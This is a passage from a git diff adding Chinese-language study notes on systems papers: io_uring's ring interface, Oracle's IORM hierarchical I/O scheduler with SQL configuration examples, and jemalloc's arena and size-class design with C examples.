IORING_OFF_SQ_RING/CQ_RING/SQES)` | 应用直接读写环和 SQE 数组 | +| 提交 / 等待 | `io_uring_enter(fd, to_submit, min_complete, flags, ...)` | 一次 syscall 可同时「提交 N 个 SQE」和「等 M 个 CQE」 | +| 高级注册 | `io_uring_register(...)` | 预注册 fd、固定 buffer 等(白皮书 §8,后续内核版本扩展) | + +`IORING_ENTER_GETEVENTS` 标志告诉内核:如果 CQ 里还没有足够的 CQE,就阻塞等待。但应用也可以**只读 CQ tail**——内核写完 CQE 会直接改 tail,不必每次都 enter。 + +### 5. 内存屏障:为什么写 tail 前要「栅栏」 + +CPU 和编译器可能重排写入顺序。如果你先更新了 SQ tail、后写完 SQE 字段,内核可能读到**半张订单卡**。 + +白皮书规定的模式: + +```c +/* 1. 填 SQE 各字段 */ +sqe->opcode = IORING_OP_READV; +sqe->fd = fd; +sqe->user_data = (uintptr_t)ctx; +/* 2. 写 SQ 环 array[index] = sqe_index */ +io_smp_mb(); /* write barrier:SQE 写入对内核可见 */ +sqring->tail = sqring->tail + 1; +io_smp_wmb(); /* 确保 tail 更新最后可见 */ +``` + +读 CQ 时则在读 `cqring->tail` 前加 `read_barrier()`。日常用 **liburing** 库即可,它会按架构选好屏障指令;直接操作 raw ring 才需要自己管。 + +### 6. 高级特性(白皮书后续章节) + +- **IOSQE_IO_DRAIN**:排空 SQ,等前面所有 IO 完成再提交后续 SQE——适合「一堆 write 之后 fsync」。 +- **IOSQE_IO_LINK**:链式 SQE,前一个成功才启动下一个——适合有序写或 read→write 管道。 +- **IORING_OP_TIMEOUT**:在 CQ 上设超时或完成计数触发器。 +- **SQPOLL / IOPOLL**(后续内核版本):内核线程轮询 SQ,或轮询块设备完成——syscall 数可趋近零。 + +## 代码示例 + +### 示例 1:用 liburing 读一个文件(入门) + +大多数应用应通过 [liburing](https://github.com/axboe/liburing) 入门,它封装了 setup、mmap、屏障和 enter: + +```c +#include +#include +#include +#include +#include + +#define QD 8 +#define BSZ 4096 + +int main(int argc, char **argv) { + struct io_uring ring; + char buf[BSZ]; + int fd; + + if (argc < 2) return 1; + fd = open(argv[1], O_RDONLY); + if (fd < 0) return 1; + + io_uring_queue_init(QD, &ring, 0); + + struct io_uring_sqe *sqe = io_uring_get_sqe(&ring); + io_uring_prep_read(sqe, fd, buf, BSZ, 0); + sqe->user_data = 1; + + io_uring_submit(&ring); /* 一次 syscall 提交 */ + + struct io_uring_cqe *cqe; + io_uring_wait_cqe(&ring, &cqe); /* 等完成 */ + if (cqe->res < 0) + fprintf(stderr, "read err: %s\n", strerror(-cqe->res)); + else + write(STDOUT_FILENO, buf, cqe->res); + + io_uring_cqe_seen(&ring, cqe); + close(fd); + io_uring_queue_exit(&ring); + return 0; +} +``` + +对比传统 `read(fd, buf, BSZ)`:这里 **submit 和 wait 可以分开**——submit 后 CPU 可以去干别的,完成后再 `wait_cqe`。批量读文件时,可以在一个 submit 里塞多个 read SQE,syscall 数从「每块一次」降到「每批一次」。 + +### 示例 2:批量提交 + 循环收割 CQE(白皮书思路) + +下面模拟白皮书 §4.2 的流程:先攒一批 SQE,一次 enter,再批量消费 CQE(伪代码风格,展示 ring 语义): + +```c +#include + +#define BATCH 32 + +void read_file_batch(struct io_uring *ring, int fd, char *bufs[BATCH], off_t base) { + /* --- 提交阶段:填满 SQ --- */ + for (int i = 0; i < BATCH; i++) { + struct io_uring_sqe *sqe = io_uring_get_sqe(ring); + io_uring_prep_read(sqe, fd, bufs[i], 4096, base + i * 4096); + sqe->user_data = i; /* 用槽位号关联完成事件 */ + } + int submitted = io_uring_submit(ring); + /* submitted 可能 < BATCH:SQ 环满时需先收割再提交 */ + + /* --- 完成阶段:head != tail 就有 CQE --- */ + int completed = 0; + while (completed < submitted) { + struct io_uring_cqe *cqe; + if (io_uring_peek_cqe(ring, &cqe) != 0) + io_uring_wait_cqe(ring, &cqe); /* CQ 空则 enter 等待 */ + + int slot = (int)cqe->user_data; + if (cqe->res > 0) + process_chunk(slot, bufs[slot], cqe->res); + else + handle_error(slot, cqe->res); + + io_uring_cqe_seen(ring, cqe); + completed++; + } +} +``` + +要点: + +- **CQ 默认是 SQ 的 2 倍大**——允许应用短暂「提交快、收割慢」;若 CQ 溢出会计入 overflow 计数。 +- `io_uring_peek_cqe` 不阻塞,适合事件循环里先扫一遍已有完成再决定是否 wait。 +- 同一 fd 的多个 read **可以并行完成**,顺序由存储栈决定,不是由提交顺序决定。 + +## 与 epoll 的区别(零基础常混) + +| | epoll | io_uring | +|---|-------|----------| +| 角色 | **通知**「fd 可读了」 | **完成**「读操作做完了,数据在这」 | +| 谁做 IO | 应用收到通知后自己 `read` | 内核按 SQE 直接执行 read/write | +| syscall | `epoll_wait` + N 次 `read` | 批量 submit + 批量 reap,可合并 | +| 类比 | 餐厅喊「你的菜好了请自己来端」 | 传菜带直接把菜送到你桌上 | + +很多高性能服务器以前用 epoll + 非阻塞 IO;io_uring 把「等就绪 + 做 IO + 拿结果」整条链收进共享环里,尤其在 **高 IOPS 磁盘** 和 **multishot 网络**(一次 SQE 持续产出多个 CQE)场景优势更大。 + +## 适用 vs 不适用 + +**适合**: + +- 数据库 / KV / 日志等磁盘密集型服务(PostgreSQL 17+、ScyllaDB、RocksDB 生态) +- 自研 thread-per-core 或 runtime(Tokio、monoio)控制调度 +- Linux 5.10+ 且你能接受较新的内核依赖 + +**不太适合**: + +- 多租户 / 高安全场景——io_uring 暴露的内核攻击面曾引发 Google 在 Android/ChromeOS 上默认禁用 +- CPU 已是瓶颈、IO 很少的小工具——复杂度不值 +- 必须跑老内核(RHEL 7/8 早期)——要么没有 io_uring,要么 op 支持残缺 + +## 历史脉络 + +- **2003**:Linux native aio(libaio)进内核,但 O_DIRECT 限制埋下祸根。 +- **2010**:Axboe 等人尝试扩展 libaio 支持 buffered IO,未成功。 +- **2018 末**:Axboe 放弃修补 libaio,开始 io_uring 原型(当时叫 scqring)。 +- **2019-01**:发表白皮书 *Efficient IO with io_uring*(本文来源 PDF)。 +- **2019-05**:Linux 5.1 合入主线(commit `2b188cc`)。 +- **2020–2025**:持续演进——buffered read/write、SQPOLL、multishot accept/recv、零拷贝 send、io_uring 上的 `openat`/`statx` 等,接口从「块 IO 加速器」长成「通用异步 syscall 管道」。 + +## 学到什么 + +1. **共享内存 + 无锁环** 可以替代大量 syscall——这是 io_uring、eBPF ring buffer、DPDK 的共同方向。 +2. **批量摊销** 永远有效:N 次 IO 合并成 1 次 `io_uring_enter`,是白皮书强调的首要效率来源。 +3. **完成语义 ≠ 就绪语义**:从 epoll 思维切到 io_uring,要想「操作已完成」而不是「现在可以调 read 了」。 +4. **新接口也要看版本**:白皮书描述的是 2019 基础 API;具体 op 列表和性能特性以当前内核 man page 为准。 + +## 延伸阅读 + +- 白皮书原文:[Efficient IO with io_uring (PDF)](https://kernel.dk/io_uring.pdf) +- LWN 导读:[Ringing in a new asynchronous I/O API](https://lwn.net/Articles/776703/) +- 用户态库:[axboe/liburing](https://github.com/axboe/liburing) 与 `examples/` 目录 +- man page:[io_uring(7)](https://man7.org/linux/man-pages/man7/io_uring.7.html)、[io_uring_setup(2)](https://man7.org/linux/man-pages/man2/io_uring_setup.2.html) +- 视频:[Kernel Recipes 2019 — Faster IO through io_uring](https://www.youtube.com/watch?v=-5T4Cjw46ys) + +## 关联 + +- [[io-uring]] —— 本仓库另一篇 io_uring 实践向笔记(multishot、SQPOLL 性能数字) +- [[ebpf]] —— 同样是用户态/内核共享数据结构,但安全模型不同 +- [[nvme-protocol-2017]] —— 把磁盘延迟压到 10µs 级,放大旧 aio 的 syscall 瓶颈 +- [[postgresql]] —— PG 17 起在 Linux 上推荐 io_uring 作为异步 IO 后端 +- [[quic]] —— 用户态网络栈与 io_uring 网络 op 的演进方向 +- [[flexsc-2010]] —— 更早的「syscall 异步化」思路,io_uring 是 Linux 主线上的落地 + +## 反向链接 + + diff --git a/src/content/docs/papers/iorm-hierarchical-i-o-governance-for-thousands-of-consolidated-databases-arxiv-2.md b/src/content/docs/papers/iorm-hierarchical-i-o-governance-for-thousands-of-consolidated-databases-arxiv-2.md new file mode 100644 index 000000000..819744e52 --- /dev/null +++ b/src/content/docs/papers/iorm-hierarchical-i-o-governance-for-thousands-of-consolidated-databases-arxiv-2.md @@ -0,0 +1,210 @@ +--- +title: IORM -- Hierarchical I/O Governance for Thousands of Consolidated Databases +来源: https://arxiv.org/abs/2605.29006 +日期: 2026-06-13 +分类: 操作系统 +子分类: 内核与虚拟化 +provenance: pipeline-v3 +--- + +# IORM -- 分层 I/O 治理:让数千个数据库共享存储也不打架 + +## 一、问题:合租公寓里的网络大战 + +想象你住在一栋大型公寓楼里。整栋楼只有一条大宽带,几十户人家共用。 + +这时候有个矛盾出现了: + +- 301 的张先生在视频会议(对延迟极其敏感,网络抖一下画面就卡) +- 502 的李先生在下载 100GB 的电影(吃满带宽,完全不急) +- 704 的公司在做数据备份(持续占着通道) + +普通的路由器(类比操作系统的 I/O 调度器)只看到"数据在流动",它不知道 301 的视频会议比 502 的下载更重要。结果就是张先生视频卡顿,很痛苦。 + +这就是 **数据库合并(consolidation)** 的核心难题:成千上万个租户的数据库共享同一套存储,但它们的 I/O 需求完全不同——有的要低延迟,有的要高吞吐,有的可以等。操作系统层面的调度器看不见"哪个请求属于哪个租户",所以无能为力。 + +IORM(I/O Resource Manager)就是 Oracle 为了解决这个问题而设计的系统,跑在 Oracle Exadata 存储服务器上。 + +## 二、核心架构:Exadata 长什么样? + +``` +数据库服务器 (Database Servers) + | + | RDMA 高速网络 + | +存储服务器 (Storage Servers) <-- IORM 调度器在这里 + | + +-- 持久内存 (PMEM) + +-- NVMe 闪存 (Flash) + +-- 机械硬盘 (HDD) +``` + +IORM 运行在存储服务器这个位置。数据库发来的每个 I/O 请求,在到达磁盘之前,都会先经过 IORM 的"安检口"。IORM 能看到每个请求的"身份标签",然后决定先处理谁、后处理谁。 + +## 三、三个核心机制 + +IORM 的设计建立在三个核心机制上: + +### 3.1 机制一:I/O 标签(I/O Tagging) + +每个 I/O 请求都带着一个标签,从数据库一路传到存储服务器。标签里包含: + +- **租户身份**:哪个数据库(PDB/CDB)发出的 +- **工作负载类型**:交互事务、批量分析、后台维护 +- **I/O 类别**:用户数据、事务日志、临时数据、备份 +- **优先级提示**:高 / 中 / 低 + +打个比方:快递分拣中心收到一堆包裹。普通的分拣只看重量和目的地;IORM 的包裹上贴着标签——"这是急诊药,加急"、"这是拼多多包裹,不急"、"这是系统日志备份,最不重要"。分拣员看到标签就知道先送哪个。 + +标签生成开销极小:每个 I/O 不到 100 纳秒。 + +### 3.2 机制二:分层资源配置(Hierarchical Resource Profiles) + +IORM 把资源管理分成三层,像俄罗斯套娃: + +``` +第一层:CDB(容器数据库) + └── 第二层:PDB(可插拔租户数据库) + └── 第三层:PDB Workload(租户内部的工作负载) +``` + +每一层都可以配置两种资源分配方式: + +- **Shares(份额)**:按比例分配。A 有 3 份,B 有 1 份,争抢时 A 拿 75% 带宽。B 不用时,A 可以独享 100%。 +- **Limits(上限)**:硬性上限。A 设置了 40% 上限,哪怕系统闲置,A 也不能超过 40%。 + +两者可以组合使用。比如"占 60% 份额,但上限 40%"——空闲时最多冲到 40%,忙的时候按比例分配。 + +关键性质:**组合隔离**。下层不能超过上层的限制。即使 PDB 内部把某个 workload 的份额设为 100%,它也不能超过该 PDB 从 CDB 分到的总量。 + +### 3.3 机制三:统一存储治理(Unified Storage Governance) + +Exadata 的存储分三层:持久内存 (PMEM)、NVMe 闪存 (Flash)、机械硬盘 (HDD)。IORM 的策略在所有这些层级上保持一致。 + +更重要的是,I/O 标签还决定**缓存放置**:哪些数据应该进入高速闪存缓存,哪些应该跳过。比如备份操作扫描大量数据但几乎不会重读,IORM 会让它直接绕过闪存缓存,防止"缓存污染"。 + +## 四、调度算法:IORM 怎么决定先处理谁的请求? + +### 4.1 队列深度控制 + +IORM 不让存储设备堆积太多请求。如果队列太深,高优先级请求就要排长队。 + +以机械硬盘为例: +- 读队列稳态目标:**62 个并发请求** + - 小请求(延迟敏感)保底 **32 个槽位** + - 大请求(批量扫描)最多 **10 个并发** +- 写队列上限:**8 个并发** + +大请求占的"空间"更大。一个 1MB 的读取消耗的成本是小请求(8KB)的 3 倍。调度器用成本权重来计算队列深度。 + +### 4.2 彩票调度(Lottery Scheduling) + +队列中有空位时,IORM 用"彩票"来决定谁先发: + +- 每个租户拥有的彩票数量 = 它的 share 值 +- 有 3 份的租户比有 1 份的租户中奖概率高三倍 +- 达到上限的租户不参与抽奖 + +彩票调度是分层进行的:先选 CDB,再在 CDB 内选 PDB,再在 PDB 内选 workload。这样保证分层策略正确组合。 + +### 4.3 利用率和截止时间 + +- **成本化利用跟踪**:不按 I/O 个数算,按"设备实际忙多久"算。200ms 一个检查点,1 秒做一次汇总校正,防止短窗口波动导致的误判。 +- **截止时间防饿死**:每个请求带到达时间戳。如果等超过 1 秒,自动提升优先级,确保没有请求被无限期搁置。 + +## 五、代码示例 + +### 示例 1:设置 CDB 级 IORM 目标 + +在 Oracle 数据库中,DBA 可以为整个容器数据库设置 IORM 目标: + +```sql +-- 将 CDB 的 IORM 目标设为"自动" +-- 系统自动检测工作负载特征并调整调度行为 +BEGIN + DBMS_RESOURCE_MANAGER.SET_IORM_SETTING( + cdb_name => 'CDB_PROD', + iorm_target => 'auto' -- 可选: low_latency / high_throughput / balanced / auto + ); +END; +/ +``` + +### 示例 2:为租户 PDB 设置份额和上限 + +```sql +-- 为可插拔数据库 PDB_SALES 设置 IORM 资源分配 +-- shares=4 表示占 4 份比例 +-- limit_pct=60 表示即使空闲最多只能用 60% 带宽 +BEGIN + DBMS_RESOURCE_MANAGER.SET_PLUGGABLE_DATABASE_SETTING( + pdb_name => 'PDB_SALES', + shares => 4, + limit_pct => 60 + ); +END; +/ + +-- 为同一 PDB 内的不同工作负载分配份额 +-- BATCH 批处理占 2 份,INTERACTIVE 交互事务占 6 份 +BEGIN + DBMS_RESOURCE_MANAGER.SET_PDB_WORKLOAD_SETTING( + pdb_name => 'PDB_SALES', + workload => 'INTERACTIVE', + shares => 6 + ); + DBMS_RESOURCE_MANAGER.SET_PDB_WORKLOAD_SETTING( + pdb_name => 'PDB_SALES', + workload => 'BATCH', + shares => 2 + ); +END; +/ +``` + +### 示例 3:验证 IORM 的运行效果 + +```sql +-- 查看当前 IORM 调度器的统计信息 +SELECT + consumer_group, + total_reads, + total_writes, + read_latency_ms, + write_latency_ms +FROM v$iostat_consumer_group +ORDER BY read_latency_ms; +``` + +## 六、为什么操作系统调度器做不到? + +这是理解 IORM 价值的关键。 + +Linux 的 I/O 调度器(CFQ、BFQ、Kyber)工作在**块层**。对它们来说,每个 8KB 的读请求都一样——它们不知道这个请求是事务提交的一部分(紧急),还是后台备份(不急)。 + +cgroups(Linux 进程级资源控制)也不行,因为一个数据库进程服务于多个租户——内核无法区分同一个进程发出的请求属于哪个租户。 + +Hypervisor 级别的调度器能区分虚拟机,但虚拟机内部的租户结构它看不到。 + +**IORM 的创新在于:把数据库的语义信息(谁在发请求、发的是什么类型的请求)传播到存储层,让调度器能做语义感知的决策。** + +## 七、评估结果(生产环境数据) + +论文在真实 Exadata 系统上做了评估,主要结论: + +- **延迟一致性大幅提升**:长尾延迟异常几乎消除。没有 IORM 时,一个后台扫描可以让事务延迟从 1ms 飙到 100ms+;有了 IORM,这种干扰基本被隔离。 +- **比例分配跟踪配置比例**:即使需求极度不均(某个租户 90% 带宽 + 其他租户各 1%),IORM 的配置比例跟踪仍然很接近设定值。 +- **分层限制正确组合**:三层限制嵌套后,不会出现下层突破上层约束的情况。 +- **调度开销可忽略**:每个 I/O 的标签生成不到 100ns。 + +## 八、实际运维经验 + +论文分享了在生产环境中的运维教训,其中一条很有意思: + +**不要用百分比去调每一层存储设备。** 因为数据库自己决定数据落在哪个层级(PMEM、Flash 还是 HDD),管理员没法指定"租户 A 用 20% 的 NVMe + 5% 的 HDD"——数据库根据缓存策略自动路由。所以策略的单位应该是租户的总 I/O 配额,而不是按设备分层设置。 + +## 九、总结:一句话理解 IORM + +> IORM 给每个 I/O 请求贴上"身份标签",然后在存储层用"分层份额+上限"来调度,让数千个租户共享存储时互不干扰。 + +类比回我们的公寓:IORM 就是一个智能物业系统——每个租户的快递都贴上标签标明重要性,快递柜有分层配额(每层楼最多占多少资源),紧急药品优先配送,备份数据直接走侧门不占主通道,缓存柜只存高频物品不被一次性扫描占用。 diff --git a/src/content/docs/papers/ix-2014.md b/src/content/docs/papers/ix-2014.md index 6060158e8..7438929a2 100644 --- a/src/content/docs/papers/ix-2014.md +++ b/src/content/docs/papers/ix-2014.md @@ -168,6 +168,7 @@ IX 只需 **3 核**就能跑满 10GbE,Linux 用完 8 核也无法跑满。原 - [[b4-2013]] —— B4 — Google 用 SDN 把跨数据中心 WAN 利用率拉到 95%+ - [[barrelfish-2009]] —— Barrelfish / Multikernel — 把多核机器当成一个小型网络来设计 OS - [[borg]] —— Borg — Google 把一万台机器假装成一台 +- [[farm-2015]] —— FaRM — 用 RDMA 把集群内存变成一块「共享白板」 - [[kvm-2007]] —— KVM 2007 — 把 Linux 内核本身变成 hypervisor - [[memcached-fb-2013]] —— Scaling Memcache at Facebook — 万台缓存怎么不被踩塌 - [[shenango-2019]] —— Shenango — 每 5 微秒重新分一次核的中央调度器 diff --git a/src/content/docs/papers/jemalloc-evans-2006.md b/src/content/docs/papers/jemalloc-evans-2006.md new file mode 100644 index 000000000..5afc880be --- /dev/null +++ b/src/content/docs/papers/jemalloc-evans-2006.md @@ -0,0 +1,251 @@ +--- +title: jemalloc(Evans 2006)— 多 arena 让多线程 malloc 不再抢同一把锁 +来源: https://people.freebsd.org/~jasone/jemalloc/bsdcan2006/jemalloc.pdf +日期: 2026-06-13 +子分类: 内核与虚拟化 +分类: 操作系统 +provenance: pipeline-v3 +--- + +## 是什么 + +jemalloc 是 Jason Evans 在 2006 年 BSDCan 上发表的 **FreeBSD libc `malloc(3)` 实现**,用来替换当时单线程时代设计、在多核 SMP 上已成瓶颈的 phkmalloc(Poul-Henning Kamp, 1998)。 + +日常类比:公司前台只有一个「杂物抽屉」,所有人领订书钉、便签、文件夹都挤在同一格子里翻找——**抽屉把手就是锁**。phkmalloc 就是这样:算法本身优秀,但多线程同时 `malloc`/`free` 时,大家抢同一把锁,CPU 核越多越堵。 + +jemalloc 的做法是: + +- **摆很多个抽屉柜**(arena),新人入职按顺序分到不同柜子(round-robin),减少撞车; +- **每种规格单独一格**(size class),要 100 字节就发 128 字节的槽,不再现场锯木头; +- **每个线程手边再放一个小收纳盒**(后来的 tcache,论文原版主要靠 arena 分片),常用尺寸随手拿,不必每次都开柜门。 + +你写的 `malloc(48)` 在内部会被**向上取整**到最近的 size class(默认 48 B 正好一档),从当前 arena 里对应 run 的 region 位图里找第一个空槽——多数路径只碰本线程绑定的 arena,锁竞争大幅下降。 + +## 为什么重要 + +不理解这篇论文,下面这些事很难讲清楚: + +- 为什么 FreeBSD 7 之后默认 malloc 能扛多线程,而 2005 年社区邮件里 jemalloc 在 5 线程 micro-benchmark 上比 phkmalloc 快 **15×(sparc64)到 80×(amd64)** +- 为什么 Firefox、Redis、Rust(早期)纷纷把 jemalloc 链进进程——**不是玄学调优,是 arena + size class 这套结构** +- 为什么今天谈 tcmalloc、mimalloc 时总说「jemalloc 系」——**多 arena、固定档位、run/region 分层**是工业界共识起点 +- 为什么 `malloc` 慢时 profiler 里经常是锁等待,而不是你的业务逻辑 + +论文摘要里的结论很直白:**多线程分配随 CPU 数扩展良好,单线程性能与 phkmalloc 相当**。它把「分配器」从 bookkeeping 问题升级成「多核缓存一致性 + 锁竞争」问题。 + +## 核心概念 + +### 1. 碎片:内部 vs 外部 + +- **内部碎片**:你要 100 B,分配器给你 128 B 档,多出的 28 B 浪费在对象两侧——size class 的代价。 +- **外部碎片**:堆上明明有空洞,但凑不出连续大块——buddy 合并规则、run 生命周期管理要对付这个。 + +phkmalloc 极度压缩工作集页;jemalloc 时代 RAM 便宜,**CPU cache 行争用**更致命。论文明确:先尽量省总内存,再在不妨碍的前提下让**时间上相邻的分配在地址上相邻**,改善 cache locality。 + +### 2. False sharing(伪共享) + +两个线程各改自己的对象,若两个对象落在**同一 cache line**(通常 64 B),硬件会让两颗 CPU 反复抢夺该行所有权——比锁还隐蔽。 + +jemalloc **不靠给每个对象 padding**(那会炸内部碎片),而是靠 **多 arena 把不同线程的元数据/对象分散**;性能关键路径上若「一线程分配、多线程写」,仍建议应用层自己按 cache line 对齐。 + +### 3. Arena:分片降低锁竞争 + +Larson & Krishnan (1998) 试过「每个 free list 一把锁」——锁争用低了,但 **cache sloshing**(分配器元数据在核间来回弹跳)仍让扩展性崩掉。他们的解法是 **多 arena + 按线程 hash 绑定**。 + +jemalloc 的改进: + +| 配置 | arena 数量 | +|------|-----------| +| 单核 | 1(抢占才可能争用) | +| 多核 | **4 × CPU 数**(默认) | + +线程**第一次** `malloc`/`free` 时 **round-robin** 绑定 arena(存在 TLS),比 hash 线程 ID 更均匀。论文在 4 核 Opteron 上默认 **16 个 arena**——`malloc-test` 在 ≤16 线程时几乎线性扩展,第 17 个线程才开始撞 arena。 + +### 4. Chunk:与内核打交道的基本单位 + +从 `sbrk`/`mmap` 拿来的内存按 **chunk** 对齐切块,默认 **2 MB**。chunk 起始地址永远是 chunk 大小的整数倍,于是给定任意指针,**O(1)** 算它属于哪个 chunk。 + +chunk 内部再交给某个 arena 切成 page run;**huge** 分配(> 半 chunk)直接独占连续 chunk,元数据放在全局红黑树(数量少,不是扩展瓶颈)。 + +### 5. Size class 三档 + 小对象三子档 + +请求先**向上取整**到最近档位: + +| 类别 | 范围(默认 4 KB 页) | 说明 | +|------|----------------------|------| +| Small / Tiny | 2–8 B | 2 的幂对齐即可 | +| Small / Quantum-spaced | 16–512 B | 按 **quantum**(通常 16 B)递增:16, 32, 48… | +| Small / Sub-page | 1–2 KB | 整页内切 region | +| Large | 4 KB–1 MB | 整 run 服务单次大块 | +| Huge | ≥ 2 MB | 直接 chunk 映射 | + +**Quantum-spaced** 是论文里的关键取舍:若只用 2 的幂档位,`malloc(48)` 会落到 64 B,内部碎片大;48 B 单独一档,**小对象平均内部碎片显著下降**,代价是档位变多、外部碎片可能略升——实测通常净赚。 + +### 6. Run + Region bitmap + +Small 对象在一个 **run**(连续若干页)里只服务**一个** size class。run 头部有 **region bitmap**: + +- 快速扫描第一个空闲 region(紧凑填充); +- **元数据与对象数据分离**——应用踩坏对象不易腐蚀分配器链表; +- tiny 档位也能支持(若在 free object 里嵌 free list 会更难做 2 B 档)。 + +每个 size class 同时有多个 run,但任一时刻只有一个 **current run**。run 按使用率分桶(QINIT → Q0 → Q25 → Q50 → Q75 → Q100),**QINIT 的 run 不会被销毁**——避免一次 `malloc`/`free` 就创建/拆掉 run 的抖动;只有空到 Q0 才删除。 + +选新 current run 的优先级:**Q50 > Q25 > Q0 > Q75**(Q75 几乎满了,当 current 会导致频繁换 run)。 + +### 7. 运行时配置(继承 phkmalloc) + +通过 `/etc/malloc.conf` 符号链接、`MALLOC_OPTIONS` 环境变量或 `malloc_options` 全局变量调参——**低开销、非侵入**。调试选项与性能参数都走这条路;统计默认编译关闭(论文坦承:连 per-arena 分配计数都会 measurable 变慢)。 + +## 代码示例 + +### 示例 1:最普通的 C 程序里发生了什么 + +```c +#include +#include +#include +#include + +#define N_THREADS 8 +#define ITERS 100000 + +static void *worker(void *arg) { + (void)arg; + for (int i = 0; i < ITERS; i++) { + /* 请求 100 字节 → jemalloc 向上取整到 128 B (quantum-spaced 档) */ + char *buf = malloc(100); + if (!buf) return NULL; + memset(buf, i & 0xff, 100); /* 触摸数据页,模拟真实使用 */ + free(buf); + } + return NULL; +} + +int main(void) { + pthread_t tid[N_THREADS]; + for (int i = 0; i < N_THREADS; i++) + pthread_create(&tid[i], NULL, worker, NULL); + for (int i = 0; i < N_THREADS; i++) + pthread_join(tid[i], NULL); + printf("done\n"); + return 0; +} +``` + +**逐行读懂路径**: + +1. 每个线程第一次 `malloc` 时绑定一个 arena(round-robin)。 +2. `100` 不是任意大小,查表得到 **128 B** size class。 +3. 在该 arena 的 128 B run 里扫 bitmap,弹出 region;若 current run 满了,按 Q50→Q25→Q0 顺序换 run。 +4. 多线程各用各 arena 时,**锁只在同一 arena 内争用**;8 线程、16 arena 时碰撞概率低。 +5. 用 phkmalloc 跑同样代码,多线程会挤**全局锁**——这正是 `malloc-test` micro-benchmark 里 phkmalloc/dlmalloc 曲线断崖的原因。 + +FreeBSD/Linux 上对比分配器: + +```bash +# 强制使用 jemalloc(需已安装 libjemalloc) +LD_PRELOAD=/usr/lib/libjemalloc.so.2 ./a.out + +# 打印退出时统计(需 jemalloc 编译时开启 stats) +MALLOC_CONF=stats_print:true LD_PRELOAD=libjemalloc.so.2 ./a.out +``` + +### 示例 2:用 `mallctl` 观察 size class 与 arena(现代 jemalloc API) + +论文里的统计输出(Figure 10 风格)在现代 jemalloc 里仍可通过 `mallctl` 读取。下面片段展示**如何查询当前线程 arena** 并**打印 bin 统计**——对应论文「bins: bin size nregs … nrequests」表头: + +```c +#define JEMALLOC_NO_DEMANGLE +#include +#include + +int main(void) { + unsigned arena; + size_t sz = sizeof(arena); + + /* 把本线程固定到 arena 3(调优热点线程时用) */ + arena = 3; + mallctl("thread.arena", NULL, NULL, &arena, sizeof(arena)); + + mallctl("thread.arena", &arena, &sz, NULL, 0); + printf("this thread uses arena %u\n", arena); + + /* 分配几种典型尺寸,制造 bin 流量 */ + void *a = malloc(16); /* tiny/quantum 边界 */ + void *b = malloc(48); /* 论文强调的非 2 幂档位 */ + void *c = malloc(512); /* small 上限附近 */ + free(a); + free(b); + free(c); + + /* 进程退出前打印统计(等价于 MALLOC_CONF=stats_print:true) */ + malloc_stats_print(NULL, NULL, NULL); + return 0; +} +``` + +编译:`cc -o probe probe.c -ljemalloc`。输出里每个 **bin** 一行:size、run 大小、请求次数——直接对应论文 cca benchmark 统计里「bin 2 T 8 … nrequests 64656199」那种表格。读表时记住:**nrequests 涨而 curruns 不涨**,说明该档位缓存命中好;**curruns 狂增**,可能有外部碎片或线程全挤同一 arena。 + +## 论文实验在说什么 + +### 多线程 + +1. **malloc-test**(Lever & Boreham, 2000):每线程循环 `malloc(512)`/`free`,共 4000 万次。jemalloc 在 ≤4 线程近线性扩展;phkmalloc/dlmalloc 第二线程起就塌,>10 线程慢到没法测。 +2. **super-smack + MySQL**:真实 DB 客户端负载。jemalloc **中位数与 phkmalloc 接近,但最坏情况稳定**;phkmalloc 在 75→80 客户端时性能断崖,尾部延迟极差。 + +### 单线程 + +五个程序(cca、cfrac、Ghostscript、sh6bench、smlng)——作者承认有**选择偏差**(专门挑 malloc 敏感的)。结论:**时间与峰值内存与 phkmalloc/dlmalloc 同级**。sh6bench 上 jemalloc 更慢是因为 benchmark **分配后不用内存**,jemalloc 每次仍要摸 bitmap,而 dlmalloc 几乎不碰元数据——**合成测试不能代表真实应用**。 + +### 碎片观测 + +作者用 `ktrace` + malloc `U` 选项 + 自写 kdump 绘图工具(Figure 9)看**时间轴上内存占用形状**,而非只看 `max RSS`。这是论文里很「工程师」的一面:标准工具只给定量峰值,布局策略要靠可视化迭代。 + +## 设计取舍(Discussion 精华) + +开发中砍掉的功能说明 **分配器性能对「多出来的计数器、除法、检查」极度敏感**: + +- per-arena 总分配字节计数 → 默认关闭统计; +- 各种 sanity check → 只留 API 必需的最小检查; +- 保留 phkmalloc 式 **运行时配置**,几乎不影响快路径。 + +论文结尾很谦虚:**没有对所有分配模式都最优的分配器**;jemalloc 的目标是 FreeBSD 多核时代够用十年——事实上它服务了 FreeBSD、Firefox、Facebook 基础设施、Redis 等远超十年的生态。 + +## 踩坑清单 + +1. **arena 数 ≠ 越多越好**:默认 `4×CPU` 是为碰撞概率设计的;嵌入式单线程应减 `narenas`。 +2. **size class 边界设计结构体**:`malloc(sizeof(T))` 若从 512 变 520,可能从 512 B 档跳到 544 B 档——**结构体 padding 要对着档位表设计**。 +3. **跨线程传递对象**:在 arena A 分配、在线程 B 频繁 `free`,B 的 arena 与对象所属 run 不一致,锁路径变长;高频 handoff 考虑内存池或 per-thread free list。 +4. **huge 分配**:大于半 chunk 走单独路径,频繁 `malloc(3MB)`/`free` 会 mmap/munmap 抖动——应自己池化或使用 `posix_memalign` + 复用。 +5. **别用 sh6bench 判生死**:论文自己说合成 trace 对碎片和性能的结论都不可靠。 + +## 与后辈分配器的关系 + +| 分配器 | 与 jemalloc 2006 的关系 | +|--------|------------------------| +| tcmalloc (Google) | 同样多 arena + size class + 线程缓存,中央 freelist 思路不同 | +| Hoard | 更早证明 per-processor heap 扩展性;jemalloc 更贴近 libc 集成 | +| mimalloc (Microsoft) | free list sharding,可视为 tcache + arena 的进一步细化 | + +## 学到什么 + +1. **多核 malloc 的第一性原理是分片**——先减少共享写 cache line,再谈 free list 技巧。 +2. **固定 size class 是用少量内部碎片换 O(1) 分配与更低元数据争用**;quantum-spaced 档位是为真实小对象分布量身定做。 +3. **run fullness 滞后(hysteresis)** 是系统设计中「避免抖动」的样板——别在边界条件上创建/销毁昂贵资源。 +4. **测量分配器必须测真实程序**——论文反复强调 Wilson et al. 1995 综述里的教训;微基准只说明上界或病理 case。 +5. **好 libc 组件能穿越二十年**——理解 2006 这篇,等于理解今天服务器进程里仍在跑的 malloc 行为。 + +## 延伸阅读 + +- 论文 PDF:[A Scalable Concurrent malloc(3) Implementation for FreeBSD](https://people.freebsd.org/~jasone/jemalloc/bsdcan2006/jemalloc.pdf) +- FreeBSD 邮件列表:[New malloc ready, take 42](https://lists.freebsd.org/pipermail/freebsd-current/2005-December/059216.html)(2005 